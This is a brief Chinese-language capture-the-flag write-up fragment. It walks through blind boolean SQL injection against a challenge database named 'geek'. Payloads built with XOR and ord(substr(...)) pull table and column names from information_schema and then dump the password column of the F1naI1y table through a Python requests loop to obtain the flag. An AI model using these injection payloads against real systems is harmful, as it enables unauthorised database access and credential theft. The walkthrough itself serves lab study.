⽤之前的脚本,注意request库的get请求⽤的是param作为参数传递,⽽post⽤的是data。
⼀步⼀步来。
使⽤geek数据库获取表名,修改代码为:sql =
"1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))<%d)^1"%(i,j),结果:
F1naI1y,Flaaaaag
使⽤F1nal1y表获取列名:sql =
"1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))<%d)^1"%(i,j)结果:
id,username,password最后⼀步:
myobj = {'id':"(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))<%d)"%(i,mid)}
x = requests.get(url, params = myobj)
最终出flag。